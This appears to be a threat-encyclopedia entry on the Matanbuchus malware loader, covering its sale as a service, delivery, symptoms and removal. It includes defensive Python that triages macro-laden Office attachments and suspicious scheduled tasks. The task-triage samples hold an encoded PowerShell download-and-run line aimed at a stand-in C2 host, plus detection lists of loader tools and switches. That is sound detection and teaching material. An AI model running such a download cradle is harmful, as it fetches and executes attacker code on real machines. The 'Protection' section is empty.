
Matanbuchus

Also known as: Matanbuchus Loader, AveBelial

Category: Malware

Type: Loader, dropper, trojan, fileless malware

Platform: Windows

Variants: Win32/Matanbuchus, O97M.MATANBUCHUS.A, Win32/Matanbuchus!mclg, MatanbuchusDroper.dll, shell96.dll, ddg.dll, Trojan:JS/Obfuse.PRBF!MTB, Trojan-Downloader.Office.Doc (IKARUS)

Damage potential: Deployment of secondary malware, data theft, ransomware attacks, compromised computer systems, or entire networks.

Overview

Matanbuchus is a malware loader that’s been sold as malware as a service (MaaS) on dark web forums since early 2021. It’s believed to have been created by a hacker known as BelialDemon, who was also linked to another type of malware called TriumphLoader. Matanbuchus is sold through Russian-speaking cybercrime forums on a subscription basis, typically costing between US$2,500 and US$4,500 monthly. Access is often limited to a small group of clients to reduce exposure.

It is designed to help execute second-stage payloads, including remote access tools and ransomware. Matanbuchus is mainly known for its ability to run “.exe” and “.dll” files directly in memory, execute custom PowerShell commands, and stay persistent by setting up scheduled tasks. Matanbuchus has been used in attacks targeting educational institutions in the United States and a high-tech organization in Belgium.

Once on a system, Matanbuchus uses various techniques to avoid detection, including anti-analysis checks that look for security software and analysis environments before the payload is run. These evasion methods make the loader harder for security products to catch, which is what makes it particularly dangerous.

Possible symptoms

Matanbuchus is designed to be stealthy, so it might not be obvious right away that it has infiltrated your computer system. However, some signs to watch for include:

  • Slower computer performance, overheating, or frequent crashes.
  • Increased network traffic or strange internet connections.
  • New files or folders you didn’t create.
  • New or unexpected programs appearing on your system.
  • Changes to system settings or desktop appearance.
  • Suspicious PowerShell execution in logs.

Sources of the infection

Matanbuchus’s delivery methods have changed a lot over time, but some of the most common ways it can get onto your computer are:

  • Phishing emails carrying malicious Excel attachments that ask you to “enable content” or “enable macros”; once enabled, the macro runs the loader.
  • Fake software installers.
  • Drive-by downloads from compromised websites.
  • Exploit kits that scan a visitor’s device for known software flaws and automatically install malware if a weakness is found.
  • Third-party file-sharing platforms and torrents.
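A practitioner's first check on an attachment like the Excel files described above is whether it carries a macro project at all, before anyone clicks “Enable Content”. The Python below is an added example, not code from the original page or from any vendor: it builds a few constructed sample attachments in memory and classifies each by container type and by the presence of a VBA project part (vbaProject.bin) or Excel 4.0 macro sheets, ignoring the file extension. Legacy binary .xls/.doc files are only flagged as needing an OLE parser (for example oletools' olevba, which is not used here).

```python
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .xls/.doc (OLE2 compound file)
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML (.xlsx/.xlsm/.docm) is a zip
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
XLM_CONTENT_TYPE = "application/vnd.ms-excel.macrosheet+xml"


def _build_ooxml(parts):
    """Build a minimal OOXML container in memory from {part_name: bytes_or_str}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in parts.items():
            z.writestr(name, data)
    return buf.getvalue()


# Constructed samples: stand-ins for attachments, not real malware.
MACRO_XLSM = _build_ooxml({
    "[Content_Types].xml": f'<Types><Default Extension="bin" ContentType="{VBA_CONTENT_TYPE}"/></Types>',
    "xl/workbook.xml": "<workbook/>",
    "xl/vbaProject.bin": OLE_MAGIC + b"\x00" * 24,   # a real VBA project is itself an OLE2 blob
})
XLM_XLSM = _build_ooxml({
    "[Content_Types].xml": f'<Types><Override PartName="/xl/macrosheets/sheet1.xml" ContentType="{XLM_CONTENT_TYPE}"/></Types>',
    "xl/workbook.xml": "<workbook/>",
    "xl/macrosheets/sheet1.xml": "<macrosheet/>",
})
CLEAN_XLSX = _build_ooxml({
    "[Content_Types].xml": "<Types/>",
    "xl/workbook.xml": "<workbook/>",
})
LEGACY_XLS = OLE_MAGIC + b"\x00" * 64


def triage_attachment(data):
    """Classify an attachment by container and macro presence, ignoring its file extension."""
    if data.startswith(OLE_MAGIC):
        # Macros in the binary formats live in OLE storages; parse them with an
        # OLE-aware tool rather than opening the file in Excel.
        return {"container": "ole2", "macros": None,
                "verdict": "legacy binary Office file; extract VBA streams with an OLE parser"}
    if not data.startswith(ZIP_MAGIC):
        return {"container": "unknown", "macros": None, "verdict": "not an Office document"}
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = z.namelist()
            content_types = (z.read("[Content_Types].xml").decode("utf-8", "replace")
                             if "[Content_Types].xml" in names else "")
    except zipfile.BadZipFile:
        return {"container": "zip", "macros": None, "verdict": "corrupt archive"}
    macros = []
    # VBA: the project part, or the content type that declares it.
    if any(n.lower().endswith("vbaproject.bin") for n in names) or VBA_CONTENT_TYPE in content_types:
        macros.append("vba")
    # Excel 4.0 (XLM) macros: macro sheets, still executable by modern Excel.
    if any(n.lower().startswith("xl/macrosheets/") for n in names) or XLM_CONTENT_TYPE in content_types:
        macros.append("xlm")
    verdict = ("macro-enabled: do not click Enable Content; detonate in a sandbox first"
               if macros else "no VBA project or Excel 4.0 macro sheet found")
    return {"container": "ooxml", "macros": macros, "verdict": verdict}


if __name__ == "__main__":
    for label, blob in [("macro.xlsm", MACRO_XLSM), ("xlm.xlsm", XLM_XLSM),
                        ("clean.xlsx", CLEAN_XLSX), ("legacy.xls", LEGACY_XLS)]:
        print(label, triage_attachment(blob))
```

The check deliberately reads the zip parts rather than trusting the extension, because a macro-enabled workbook renamed to .xlsx still contains its vbaProject.bin.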

Protection

You can protect your computer from Matanbuchus and similar threats by following safe digital habits:

Matanbuchus removal

If you suspect that Matanbuchus has infected your device:

  • Disconnect the device from the internet to prevent further communication with command and control servers.
  • Boot your computer in safe mode to prevent the malware from running.
  • Use updated security software to perform a full system scan and remove detected threats.
  • Review scheduled tasks and startup entries for unauthorized additions.
  • Delete files you have confirmed as malicious (for example by checking their hashes against a reputable scanner); deleting every file you merely don’t recognize risks breaking legitimate software.
  • Change all passwords, especially for admin or sensitive accounts.
  • If you're not sure the malware is completely gone, it’s safest to reinstall your whole system and restore your files from clean backups.
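The review of scheduled tasks in the steps above is where a loader that persists through Task Scheduler (as the overview describes) is most likely to show itself. The Python below is an added example, not code from the original page or any vendor: it parses Windows Task Scheduler XML (the format written by `schtasks /query /xml` and stored under C:\Windows\System32\Tasks) and flags actions that run living-off-the-land binaries, point at user-writable directories, or launch PowerShell with hidden/bypass/encoded switches, decoding any `-EncodedCommand` payload. The task definitions, paths, and the `c2.invalid` URL are constructed for the example.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace used by schtasks and the task files on disk.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Living-off-the-land binaries that loaders commonly point a task at.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
# Locations a standard user can write to; legitimate scheduled services rarely run from here.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.I)
# PowerShell switches that hide the window, skip execution policy, or carry an encoded script.
PS_FLAGS = re.compile(r"-(enc(odedcommand)?|w(indowstyle)?\s+hidden|ep\s+bypass|"
                      r"executionpolicy\s+bypass|nop(rofile)?)\b", re.I)
XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")


def decode_encoded_command(args):
    """Return the plaintext of a -EncodedCommand payload (UTF-16LE, base64), or None."""
    m = re.search(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", args, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_task_xml(xml_text):
    """Score one task definition; returns its triggers, actions and why they look suspicious."""
    # Task files on disk are UTF-16 with a matching declaration; ElementTree rejects
    # that declaration on str input, so read with encoding="utf-16" and drop it here.
    root = ET.fromstring(XML_DECL.sub("", xml_text))
    findings, actions = [], []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        actions.append((cmd, args))
        exe = cmd.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe in LOLBINS:
            findings.append(f"runs living-off-the-land binary {exe}")
        if USER_WRITABLE.search(cmd + " " + args):
            findings.append("references a user-writable directory")
        if exe in ("powershell.exe", "pwsh.exe") and PS_FLAGS.search(args):
            findings.append("PowerShell launched with hidden/bypass/encoded switches")
        decoded = decode_encoded_command(args)
        if decoded:
            findings.append(f"encoded command decodes to: {decoded}")
    triggers = [t.tag.split("}")[-1] for t in root.findall("./t:Triggers/*", NS)]
    return {"triggers": triggers, "actions": actions, "findings": findings,
            "suspicious": bool(findings)}


def _task(trigger, command, arguments):
    """Build a constructed task definition in the real schema (not a captured sample)."""
    return ('<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            f"<Triggers><{trigger}><Enabled>true</Enabled></{trigger}></Triggers>"
            '<Actions Context="Author"><Exec>'
            f"<Command>{command}</Command><Arguments>{arguments}</Arguments>"
            "</Exec></Actions></Task>")


PS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage2')"
ENCODED = base64.b64encode(PS_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_TASKS = {
    # a DLL loaded from a user profile at logon, the persistence pattern described above
    "dll_at_logon": _task("LogonTrigger", "rundll32.exe",
                          r"C:\Users\alice\AppData\Roaming\shell96.dll,Start"),
    "encoded_ps": _task("BootTrigger",
                        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                        f"-nop -w hidden -enc {ENCODED}"),
    "vendor_updater": _task("CalendarTrigger",
                            r"C:\Program Files\ExampleVendor\updater.exe", "/silent"),
}

if __name__ == "__main__":
    for name, xml in SAMPLE_TASKS.items():
        r = triage_task_xml(xml)
        print(name, "SUSPICIOUS" if r["suspicious"] else "ok", r["findings"])
```

On a live machine, export each task with `schtasks /query /tn <name> /xml` or read the files under C:\Windows\System32\Tasks with `open(path, encoding="utf-16")` and pass the text to `triage_task_xml`; review the flagged entries by hand before deleting anything, since the heuristics above are indicators, not proof.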

If you're uncertain or unable to remove the malware manually yourself, it’s best to seek professional assistance.